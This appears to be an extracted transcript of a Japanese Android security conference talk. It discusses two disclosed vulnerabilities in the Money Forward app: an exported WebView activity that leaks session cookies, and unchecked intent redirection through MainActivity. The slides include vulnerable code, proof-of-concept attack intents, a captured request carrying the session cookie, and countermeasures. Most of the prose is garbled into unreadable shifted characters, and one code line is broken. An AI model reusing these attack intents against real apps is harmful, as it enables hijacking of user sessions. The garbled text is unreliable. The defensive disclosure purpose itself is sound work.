ドキッ★脆弱性 onCreate() から onDestroy() まで

Transcript

1. υΩο˒੬ऑੑ
   
   PO$SFBUF
   ͔Β
   PO%FTUSPZ
   ·Ͱ !LFOTDBM

2. "CPVU
   .F w ླ໦ݚޗ LFOTDBM
   w ॴଐ
   .POFZ
   'PSXBSE
   *OD $
   'SPN4PGUXBSF

   
   *OD
   "MM
   SJHIUT
   

3. ڈ೥ͷ%SPJE,BJHJ w ʮ໌೔ɺഊૌ͠ͳ͍ͨΊͷηΩϡΞίʔσΟϯάʯ IUUQTESPJELBJHJHJUIVCJP

4. ࠓ೥ͷ%SPJE,BJHJ w υΩο˒੬ऑੑ
   PO$SFBUF
   ͔Β
   PO%FTUSPZ
   ·Ͱ
   IUUQTESPJELBJHJHJUIVCJP

5. ηΩϡϦςΟͳϑϨϯζ

6. None
7. None

8. ੬ऑੑग़ͪ͠Ό͍·ͨ͠

9. /*4$
   αΠόʔηΩϡϦςΟ݄ؒ ݄೔ ͍͞͹ʔ ·Ͱͷීٴ ܒൃڧԽػؔ

10. ࠓ೔࿩͢͜ͱ w ੬ऑੑͷ֓ཁ
    w ੬ऑੑͷৄࡉ
    w ੬ऑੑͷ࣮૷
    w ੬ऑੑͷݪҼ
    w

    ੬ऑੑͷରࡦ

11. ੬ऑੑͷ֓ཁ

12. +7/ w 8FC7JFXΛར༻ͨ͠"DUJWJUZʹରͯ͠ɺ೚ҙ ͷίʔυΛ࣮ߦ͞ΕΔ੬ऑੑ
    w BLB
    $7& w ίʔυωʔϜ
    αʔόϧ

13. +7/ w ֎෦ΞϓϦ͔Βඇެ։
    "DUJWJUZ
    ͕࣮ߦ͞ΕΔ
    w BLB
    $7& w ίʔυωʔϜ
    ϋγϏϩί΢

14. αʔόϧͷৄࡉ

15. ࣮૷

16. d

17. "OESPJE.BOJGFTU <activity android:name="hoge.WebViewActivity" android:label=“@string/blank” /> ಺෦ݶఆͳͷʹެ։͞Ε͍ͯΔ

18. d

19. "OESPJE.BOJGFTU <activity android:name="hoge.WebViewActivity" android:label="@string/blank"> <intent-filter> <action android:name="android.intent.action.VIEW" /> <category android:name="android.intent.category.DEFAULT"

    /> <data android:scheme="insecure" /> <data android:scheme="webview" /> </intent-filter> </activity>

20. protected String getUrl() { final String url = getIntent().getDataString(); if

    (dataString.contains(SCHEME_INSECURE_WEBVIEW)) { return url.replace(SCHEME_INSECURE,HTTP); } else { return url.replace(SCHEME_WEBVIEW,HTTPS) } } 8FC7JFX"DUJWJUZ ಺෦༻Ͱ͸ͳ͍ػೳͷ௥Ճ ຊདྷͷ༻్Ͱ͸ͳ͍
    ݺͼग़͠ݩͷݕূ͕͞Ε͍ͯͳ͍
    

21. 
    d

22. 
    d ෆཁͳϦιʔε͕࡟আ͞Ε͍ͯͳ͍

23. None
24. None

25. ߈ܸʢྫʣ

26. None

27. Uri uri = Uri.parse("http://moneyforward.com/some_api"); Intent i = new Intent(Intent.ACTION_VIEW, uri);

    i.putExtra("title", "Get Profile"); i.setClassName("com.moneyforward.android.app", "hoge.WebViewActivity"); i.putExtra("JavaScript", true); i.putExtra("sync_cookies", true); startActivity(i); ߈ܸίʔυ

28. ߈ܸ݁Ռ GET /some_api HTTP/1.1 Host: moneyforward.com Connection: close Accept: text/html,application/xhtml+xml,application/

    xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: MFAndroidApp/7.9.2/14070903/UnitInfo/samsung/samsung/ SC-04F/4.4.2/19 Accept-Encoding: gzip,deflate Accept-Language: en-US Cookie: _session={ηογϣϯΩʔ} ˒ X-Requested-With: com.moneyforward.android.app

29. ݪҼͱରࡦ

30. w ಺෦ݶఆΫϥεͷެ։
    w ಺෦༻Ͱ͸ͳ͍ػೳͷ௥Ճ ຊདྷͷ༻్֎ͷར༻
    w ֎෦ݺͼग़͠ݩΛະݕূ ݪҼ

31. w FYQPSUFEGBMTFͷઃఆ
    w ֎෦ݺͼग़͠ݩͷϗϫΠτϦετొ࿥ͱݕূ
    w Ϋϥεͷ໨తΛ఻͑Δίϝϯτ
    w ෆཁͳΫϥεͷ࡟আ ରࡦ

32. ϋγϏϩί΢ͷৄࡉ

33. ࣮૷

34. d೥݄ .BJO
    "DUJWJUZ &YUFSOBM
    
    "QQ

35. d೥݄ .BJO
    "DUJWJUZ &YUFSOBM
    
    "QQ ֎෦ΞϓϦͷݕূ͕͞Εͯͳ͍
    ʢͦΕࣗମ͸੬ऑੑʹͳΒͳ͔ͬͨʣ

36. ೥݄ࠒ 1VTI
    5BSHFUFE
    "DUJWJUZ
    $MBTT
    /BNF ༧ࢉ
    "DUJWJUZ Ոܭ฽
    "DUJWJUZ खೖྗ
    "DUJWJUZ .POEBZ 5VFTEBZ

    5IVSTEBZ .BJO
    "DUJWJUZ &YUFSOBM
    
    "QQ

37. ೥݄ࠒ 1VTI
    5BSHFUFE
    "DUJWJUZ
    $MBTT
    /BNF ༧ࢉ
    "DUJWJUZ Ոܭ฽
    "DUJWJUZ खೖྗ
    "DUJWJUZ .POEBZ 5VFTEBZ

    5IVSTEBZ .BJO
    "DUJWJUZ &YUFSOBM
    
    "QQ ֎෦ΞϓϦͷݕূ͕͞Εͯͳ͍
    ʢ͜͜Ͱ੬ऑੑ͕ݦࡏԽ͞ΕΔʣ

38. final Serializable launchActivityClass = getIntent().getSerializableExtra(GCMCommand.EXTRA_LAUNCH_ACTIVITY); if (launchActivityClass != null &&

    launchActivityClass instanceof Class<?> && launchActivityClass != this.getClass()) { startActivity( new Intent(this, (Class<?>)), launchActivityClass); } .BJO"DUJWJUZ

39. ݺͼग़͠ઌͷ"DUJWJUZ <activity android:name="hoge.HogeActivity" android:exported="false" android:label="@string/label_transactions_title" android:launchMode="singleTask"> <intent-filter> <action android:name="android.intent.action.VIEW" />

    <category android:name="android.intent.category.DEFAULT" /> </intent-filter>

40. ߈ܸʢྫʣ

41. .BJO
    "DUJWJUZ $SBGUFE
    *OUFOU 5BSHFU
    "DUJWJUZ

42. ߈ܸίʔυ hoge.TargetActivity o = new hoge.Targettivity(); Intent i = new

    Intent(); i.setClassName("com.moneyforward.android.app", "com.moneyforward.android.ui.MainActivity"); i.setAction("android.intent.action.VIEW"); i.putExtra("launchActivity", o.getClass()) startActivity(i);

43. ݪҼͱରࡦ

44. w ֎෦ݺͼग़͠ݩΛະݕূ ݪҼ

45. w ֎෦ݺͼग़͠ݩͷϗϫΠτϦετొ࿥ͱݕূ ରࡦ

46. ͜ΕͰ҆શͳੈքΛ
    औΓ໭ͤͨ

47. ͜ΕͰ҆શͳੈքΛ
    औΓ໭ͤͨ ͳΘ͚͕ͳ͍

48. 4BGFUZ
    WT
    4FDVSJUZ w ҆શ
    
    4BGFUZ
    /PU
    4FDVSJUZ
    w 4BGFUZ
    JT
    UIF
    DPOEJUJPO
    PG
    B
    lTUFBEZ
    TUBUFz
    PG
    BO
    PSHBOJ[BUJPO
    PS
    QMBDF
    EPJOH
    XIBU
    JU
    JT
    TVQQPTFE
    UP
    EP
    w

    4FDVSJUZ
    JT
    UIF
    QSPDFTT
    
    PG
    EFMBZJOH
    QSFWFOUJOH
    BOE
    PUIFSXJTF
    QSPUFDUJOH
    BO
    PSHBOJ[BUJPO`T
    lTUFBEZ
    TUBUF z w <ग़య>
    IUUQTFOXJLJQFEJBPSHXJLJ4BGFUZDJUF@OPUF"JB

49. ҆શͰͳ͘ͳΔཁҼ w ෆཁͳϦιʔε͸ؾ͖ͮʹ͍͘ɻ
    w ຊདྷͷΫϥεͷҙਤͱ͸ҟͳΔػೳ͕௥Ճ͞ΕΔ
    w IUUQTະରԠͳαʔυύʔςΟ޿ࠂΛ͍Εͯ͠·͏
    w FYQPSUFEGBMTFΛԿͱͳ͘ɺUSVFʹม͑ͯ͠·͏ ͔΋͠Εͳ͍
    

    w FUD
    FUDʜ

50. w <ग़య>
    IUUQUFDIEJTTFDUFEDPNXQDPOUFOUVQMPBET4PGUXBS

51. ҆શΛ୲อ͢Δ࢓૊Έ

52. /FUXPSL
    4FDVSJUZ
    $POpH w શ௨৴ͷ)5514Խͷڧ੍ w ূ໌ॻͷϐχϯά
    w ৴པͰ͖Δ$"ͷ௥Ճ
    w FUD
    FUD

53. ෆཁϑΝΠϧͷࣗಈݕ஌ w ݺ͹Εͯͳ͍"OESPJEίϯϙʔωϯτͷݕ஌
    CZ
    MJOU
    w IUUQTHJUIVCDPNLFOTDBM6OVTFE"DUJWJUZ-JOU

54. 1SFMBVODI
    3FQPSU

55. ͔͠͠

56. ੬ऑੑ͸ίʔυͰىͬͯ͜ΔΜ͡Όͳ͍
    
    ݱ৔Ͱ͓͍ͬͯ͜ΔΜͩʂ

57. ຊ౰ʹ͋ͬͨා͍$.ͷ࿩

58. Ұ൪ͷ8FBLFTU
    -JOL
    
    ਓ w <ग़య>
    IUUQTUSVUIIVOUTNBOpMFTXPSEQSFTTDPNXFBLFTUMJO

59. lͲͷΑ͏ͳ໰୊ʹͯ͠΋ɺੜ࢈ ϓϩηεͷதͰɺͰ͖Δ͔͗Γ
    Ձ஋͕࠷௿ͷஈ֊Ͱ໰୊Λൃݟ ͯ͠ղܾ͢΂͖z w <ग़య>
    )*()
    065165
    ."/"(&.&/5
    ୈ෦ɹே৯޻৔
    
    ੜ࢈ͷجຊݪཧ

60. ਓͷରࡦ w "OESPJEηΩϡΞίʔσΟϯάΨΠυΛར༻ͨ͠τ Ϩʔχϯά
    w ίʔσΟϯάن໿ͷࡦఆ
    w FUD ܧଓతʹ૊৫తʹऔΓ૊ΜͰ͍͘ඞཁ͕͋Δ

61. ·ͱΊ

62. ·ͱΊ w ੬ऑੑͷݪҼ͸ɺԿͷม఩΋ͳ͍جຊରࡦ΋Ε
    w νʔϜ͕มΘΔɺձࣾશମͷࢪࡦͱ͔ͿΔͳͲɺඇ ٕज़తͳӨڹ΋͋Δ
    w ͜͏͍ͬͨཁૉʹӨڹ͞Εʹ͍͘ɺݎ࿚ 3FTJMJFOU Ͱ҆શͳΞϓϦΛఏڙ͠ଓ͚ΔͨΊͷରࡦΛͱͬͯ

    ͍͘ɻ

63. དྷ೥͸ͦͷ੒Ռʹ͍ͭͯ࿩͍ͨ͠

64. ͝ਗ਼ௌ͋Γ͕ͱ͏͍͟͝·ͨ͠